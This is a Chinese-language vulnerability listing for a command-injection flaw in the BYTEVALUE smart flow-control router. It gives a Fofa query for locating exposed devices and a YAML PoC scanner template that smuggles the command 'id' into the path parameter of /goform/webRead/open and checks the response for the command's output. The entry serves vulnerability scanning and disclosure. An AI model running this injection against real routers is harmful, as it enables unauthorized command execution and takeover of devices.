bytevalue-webread-rce: 百为智能流控路由器命令执行

日期: 2025-09-01 | 影响软件: bytevalue webread rce | POC: 已公开

漏洞描述

百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。 Fofa: title="BYTEVALUE 智能流控路由器"

PoC代码[已公开]

id: bytevalue-webread-rce

info:
  name: 百为智能流控路由器命令执行
  author: zan8in
  severity: critical
  verified: true
  description: |-
    百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
    Fofa: title="BYTEVALUE 智能流控路由器"
  reference:
    - https://mp.weixin.qq.com/s/h0hUSZbjM15ehEfRqcb5eQ
  tags: bytevalue,rce
  created: 2024/01/07

rules:
  r0:
    request:
      method: GET
      path: /goform/webRead/open/?path=|id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()

相关漏洞推荐